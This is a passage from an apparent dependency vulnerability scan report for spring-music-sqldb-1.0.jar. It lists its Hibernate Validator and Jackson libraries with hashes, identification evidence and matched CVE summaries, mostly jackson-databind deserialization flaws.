Product | pom | developer name | Emmanuel Bernard | Low
Product | pom | developer name | Hardy Ferentschik | Low
Product | pom | developer name | Steve Ebersole | Low
Product | pom | developer org | Red Hat, Inc. | Low
Product | pom | groupid | org.hibernate.javax.persistence | Highest
Product | pom | name | Java Persistence API, Version 2.1 | High
Product | pom | url | http://hibernate.org | Medium
Version | central | version | 1.0.0.Final | Highest
Version | Manifest | Bundle-Version | 1.0.0.Final | High
Version | Manifest | Implementation-Version | 1.0.0.Final | High
Version | pom | version | 1.0.0.Final | Highest
spring-music-sqldb-1.0.jar: hibernate-validator-6.0.9.Final.jar
Description:
Hibernate's Bean Validation (JSR-380) reference implementation.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/hibernate-validator-6.0.9.Final.jar
MD5: 6250c442411c5d0c7ba6fe3ca9935ea7
SHA1: b149e4cce82379f11f6129eb3187ca8ae5404005
SHA256: be05d5979abb40f804c35e2d67ffd950eb22dab9bd2bd618618bcc726264b022
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | hibernate-validator | High
Vendor | hint analyzer | vendor | redhat | Highest
Vendor | jar | package name | engine | Highest
Vendor | jar | package name | hibernate | Highest
Vendor | jar | package name | validator | Highest
Vendor | Manifest | automatic-module-name | org.hibernate.validator | Medium
Vendor | Manifest | bundle-symbolicname | org.hibernate.validator.hibernate-validator | Medium
Vendor | Manifest | implementation-url | http://hibernate.org/validator/ | Low
Vendor | Manifest | Implementation-Vendor | org.hibernate.validator | High
Vendor | Manifest | Implementation-Vendor-Id | org.hibernate.validator | Medium
Vendor | pom | artifactid | hibernate-validator | Low
Vendor | pom | groupid | org.hibernate.validator | Highest
Vendor | pom | name | Hibernate Validator Engine | High
Vendor | pom | parent-artifactid | hibernate-validator-parent | Low
Product | file | name | hibernate-validator | High
Product | jar | package name | engine | Highest
Product | jar | package name | hibernate | Highest
Product | jar | package name | validator | Highest
Product | Manifest | automatic-module-name | org.hibernate.validator | Medium
Product | Manifest | Bundle-Name | Hibernate Validator Engine | Medium
Product | Manifest | bundle-symbolicname | org.hibernate.validator.hibernate-validator | Medium
Product | Manifest | Implementation-Title | hibernate-validator | High
Product | Manifest | implementation-url | http://hibernate.org/validator/ | Low
Product | Manifest | specification-title | Bean Validation | Medium
Product | pom | artifactid | hibernate-validator | Highest
Product | pom | groupid | org.hibernate.validator | Highest
Product | pom | name | Hibernate Validator Engine | High
Product | pom | parent-artifactid | hibernate-validator-parent | Medium
Version | Manifest | Bundle-Version | 6.0.9.Final | High
Version | Manifest | Implementation-Version | 6.0.9.Final | High
Version | pom | version | 6.0.9.Final | Highest
CVE-2025-35036 (OSSINDEX)
Hibernate Validator before 6.2.0 and 7.0.0, by default and depending how it is used, may interpolate user-supplied input in a constraint violation message with Expression Language. This could allow an attacker to access sensitive information or execute arbitrary Java code. Hibernate Validator as of 6.2.0 and 7.0.0 no longer interpolates custom constraint violation messages with Expression Language and strongly recommends not allowing user-supplied input in constraint violation messages. CVE-2020-5245 and CVE-2025-4428 are examples of related, downstream vulnerabilities involving Expression Language interpolation of user-supplied data. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv2:
Base Score: MEDIUM (6.900000095367432) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.hibernate.validator:hibernate-validator:6.0.9.Final:*:*:*:*:*:*:*
CVE-2019-10219
A vulnerability was found in Hibernate-Validator. The SafeHtml validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions. This vulnerability can result in an XSS attack. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2023-1932
A flaw was found in hibernate-validator's 'isValid' method in the org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator class, which can be bypassed by omitting the tag ending in a less-than character. Browsers may render invalid HTML, allowing HTML injection or Cross-Site-Scripting (XSS) attacks. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2020-10693
A flaw was found in Hibernate Validator version 6.1.2.Final. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitization (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: jackson-annotations-2.9.0.jar
Description:
Core annotations used for value types, used by Jackson data binding package.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-annotations-2.9.0.jar
MD5: c09faa1b063681cf45706c6df50685b6
SHA1: 07c10d545325e3a6e72e06381afe469fd40eb701
SHA256: 45d32ac61ef8a744b464c54c2b3414be571016dd46bfc2bec226761cf7ae457a
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | jackson-annotations | High
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | Manifest | bundle-docurl | http://github.com/FasterXML/jackson | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.core.jackson-annotations | Medium
Vendor | Manifest | implementation-build-date | 2017-07-30 03:53:23+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.core | Medium
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-annotations | Low
Vendor | pom | groupid | com.fasterxml.jackson.core | Highest
Vendor | pom | name | Jackson-annotations | High
Vendor | pom | parent-artifactid | jackson-parent | Low
Vendor | pom | parent-groupid | com.fasterxml.jackson | Medium
Vendor | pom | url | http://github.com/FasterXML/jackson | Highest
Product | file | name | jackson-annotations | High
Product | hint analyzer | product | java8 | Highest
Product | hint analyzer | product | modules | Highest
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | Manifest | bundle-docurl | http://github.com/FasterXML/jackson | Low
Product | Manifest | Bundle-Name | Jackson-annotations | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.core.jackson-annotations | Medium
Product | Manifest | implementation-build-date | 2017-07-30 03:53:23+0000 | Low
Product | Manifest | Implementation-Title | Jackson-annotations | High
Product | Manifest | specification-title | Jackson-annotations | Medium
Product | pom | artifactid | jackson-annotations | Highest
Product | pom | groupid | com.fasterxml.jackson.core | Highest
Product | pom | name | Jackson-annotations | High
Product | pom | parent-artifactid | jackson-parent | Medium
Product | pom | parent-groupid | com.fasterxml.jackson | Medium
Product | pom | url | http://github.com/FasterXML/jackson | Medium
Version | file | version | 2.9.0 | High
Version | Manifest | Bundle-Version | 2.9.0 | High
Version | Manifest | Implementation-Version | 2.9.0 | High
Version | pom | version | 2.9.0 | Highest
CVE-2018-1000873
FasterXML Jackson versions before 2.9.8 contain a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in a denial-of-service (DoS). This attack appears to be exploitable when the victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: jackson-core-2.9.5.jar
Description:
Core Jackson processing abstractions (aka Streaming API), implementation for JSON
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-core-2.9.5.jar
MD5: ec59f24f7f8d9acf53301c562722adf2
SHA1: a22ac51016944b06fd9ffbc9541c6e7ce5eea117
SHA256: a2bebaa325ad25455b02149c67e6052367a7d7fc1ce77de000eed284a5214eac
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | jackson-core | High
Vendor | jar | package name | base | Highest
Vendor | jar | package name | core | Highest
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | jar | package name | json | Highest
Vendor | Manifest | automatic-module-name | com.fasterxml.jackson.core | Medium
Vendor | Manifest | bundle-docurl | https://github.com/FasterXML/jackson-core | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.core.jackson-core | Medium
Vendor | Manifest | implementation-build-date | 2018-03-26 15:03:46+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.core | Medium
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-core | Low
Vendor | pom | groupid | com.fasterxml.jackson.core | Highest
Vendor | pom | name | Jackson-core | High
Vendor | pom | parent-artifactid | jackson-base | Low
Vendor | pom | parent-groupid | com.fasterxml.jackson | Medium
Vendor | pom | url | FasterXML/jackson-core | Highest
Product | file | name | jackson-core | High
Product | hint analyzer | product | java8 | Highest
Product | hint analyzer | product | modules | Highest
Product | jar | package name | base | Highest
Product | jar | package name | core | Highest
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | jar | package name | json | Highest
Product | Manifest | automatic-module-name | com.fasterxml.jackson.core | Medium
Product | Manifest | bundle-docurl | https://github.com/FasterXML/jackson-core | Low
Product | Manifest | Bundle-Name | Jackson-core | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.core.jackson-core | Medium
Product | Manifest | implementation-build-date | 2018-03-26 15:03:46+0000 | Low
Product | Manifest | Implementation-Title | Jackson-core | High
Product | Manifest | specification-title | Jackson-core | Medium
Product | pom | artifactid | jackson-core | Highest
Product | pom | groupid | com.fasterxml.jackson.core | Highest
Product | pom | name | Jackson-core | High
Product | pom | parent-artifactid | jackson-base | Medium
Product | pom | parent-groupid | com.fasterxml.jackson | Medium
Product | pom | url | FasterXML/jackson-core | High
Version | file | version | 2.9.5 | High
Version | Manifest | Bundle-Version | 2.9.5 | High
Version | Manifest | Implementation-Version | 2.9.5 | High
Version | pom | version | 2.9.5 | Highest
CVE-2025-49128 (OSSINDEX)
Jackson-core contains core low-level incremental ("streaming") parser and generator abstractions used by Jackson Data Processor. Starting in version 2.0.0 and prior to version 2.13.0, a flaw in jackson-core's `JsonLocation._appendSourceDesc` method allows up to 500 bytes of unintended memory content to be included in exception messages. When parsing JSON from a byte array with an offset and length, the exception message incorrectly reads from the beginning of the array instead of the logical payload start. This results in possible information disclosure in systems using pooled or reused buffers, like Netty or Vert.x. This issue was silently fixed in jackson-core version 2.13.0, released on September 30, 2021, via PR #652. All users should upgrade to version 2.13.0 or later. If upgrading is not immediately possible, applications can mitigate the issue by disabling exception message exposure to clients to avoid returning parsing exception messages in HTTP responses and/or disabling source inclusion in exceptions to prevent Jackson from embedding any source content in exception messages, avoiding leakage.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-49128 for details CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv2:
Base Score: MEDIUM (6.900000095367432) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.fasterxml.jackson.core:jackson-core:2.9.5:*:*:*:*:*:*:*
CVE-2018-1000873
FasterXML Jackson versions before 2.9.8 contain a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in a denial-of-service (DoS). This attack appears to be exploitable when the victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: jackson-databind-2.9.5.jar
Description:
General data-binding functionality for Jackson: works on core streaming API
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-databind-2.9.5.jar
MD5: 34b37affbf74f5d199be10622ddc83cd
SHA1: 3490508379d065fe3fcb80042b62f630f7588606
SHA256: 0fb4e079c118e752cc94c15ad22e6782b0dfc5dc09145f4813fb39d82e686047
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | jackson-databind | High
Vendor | jar | package name | databind | Highest
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | Manifest | automatic-module-name | com.fasterxml.jackson.databind | Medium
Vendor | Manifest | bundle-docurl | http://github.com/FasterXML/jackson | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.core.jackson-databind | Medium
Vendor | Manifest | implementation-build-date | 2018-03-26 15:13:41+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.core | Medium
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-databind | Low
Vendor | pom | groupid | com.fasterxml.jackson.core | Highest
Vendor | pom | name | jackson-databind | High
Vendor | pom | parent-artifactid | jackson-base | Low
Vendor | pom | parent-groupid | com.fasterxml.jackson | Medium
Vendor | pom | url | http://github.com/FasterXML/jackson | Highest
Product | file | name | jackson-databind | High
Product | hint analyzer | product | java8 | Highest
Product | hint analyzer | product | modules | Highest
Product | jar | package name | databind | Highest
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | Manifest | automatic-module-name | com.fasterxml.jackson.databind | Medium
Product | Manifest | bundle-docurl | http://github.com/FasterXML/jackson | Low
Product | Manifest | Bundle-Name | jackson-databind | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.core.jackson-databind | Medium
Product | Manifest | implementation-build-date | 2018-03-26 15:13:41+0000 | Low
Product | Manifest | Implementation-Title | jackson-databind | High
Product | Manifest | specification-title | jackson-databind | Medium
Product | pom | artifactid | jackson-databind | Highest
Product | pom | groupid | com.fasterxml.jackson.core | Highest
Product | pom | name | jackson-databind | High
Product | pom | parent-artifactid | jackson-base | Medium
Product | pom | parent-groupid | com.fasterxml.jackson | Medium
Product | pom | url | http://github.com/FasterXML/jackson | Medium
Version | file | version | 2.9.5 | High
Version | Manifest | Bundle-Version | 2.9.5 | High
Version | Manifest | Implementation-Version | 2.9.5 | High
Version | pom | version | 2.9.5 | Highest
CVE-2018-14721
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization. CWE-918 Server-Side Request Forgery (SSRF)
CVSSv3:
Base Score: CRITICAL (10.0) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
CVE-2018-11307
An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
OSSINDEX - [CVE-2018-11307] CWE-502: Deserialization of Untrusted Data
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11307
OSSIndex - https://blog.sonatype.com/jackson-databind-remote-code-execution
OSSIndex - https://blog.sonatype.com/jackson-databind-the-end-of-the-blacklist
OSSIndex - https://github.com/FasterXML/jackson-databind/issues/2032
Vulnerable Software & Versions:
CVE-2018-14718
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
CVE-2018-14719
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
CVE-2018-14720
FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization. CWE-611 Improper Restriction of XML External Entity Reference, CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
CVE-2018-19360
FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
CVE-2018-19361
FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the openjpa class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
CVE-2018-19362
FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the jboss-common-core class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (ISSUE_TRACKING, MAILING_LIST, PATCH, RELEASE_NOTES, THIRD_PARTY_ADVISORY, VDB_ENTRY)
Vulnerable Software & Versions:
CVE-2019-14379
SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2 mishandles default typing when ehcache is used (because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup), leading to remote code execution. CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (ISSUE_TRACKING, MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2019-14540
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, RELEASE_NOTES, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2019-14892
A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5 and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code. CWE-502 Deserialization of Untrusted Data, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-14893
A flaw was discovered in FasterXML jackson-databind in all versions before 2.9.10 and 2.10.0, where it would permit polymorphic deserialization of malicious objects using the xalan JNDI gadget when used in conjunction with polymorphic type handling methods such as `enableDefaultTyping()` or when @JsonTypeInfo is using `Id.CLASS` or `Id.MINIMAL_CLASS` or in any other way which ObjectMapper.readValue might instantiate objects from unsafe sources. An attacker could use this flaw to execute arbitrary code. CWE-502 Deserialization of Untrusted Data, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-16335
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariDataSource. This is a different vulnerability than CVE-2019-14540. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (ISSUE_TRACKING, MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2019-16942
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (ISSUE_TRACKING, MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2019-16943
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (ISSUE_TRACKING, MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2019-17267
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-17531
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-20330
FasterXML jackson-databind 2.x before 2.9.10.2 lacks certain net.sf.ehcache blocking. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-8840
FasterXML jackson-databind 2.0.0 through 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2020-9546
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config). CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-9547
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-9548
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core). CWE-502 Deserialization of Untrusted Data
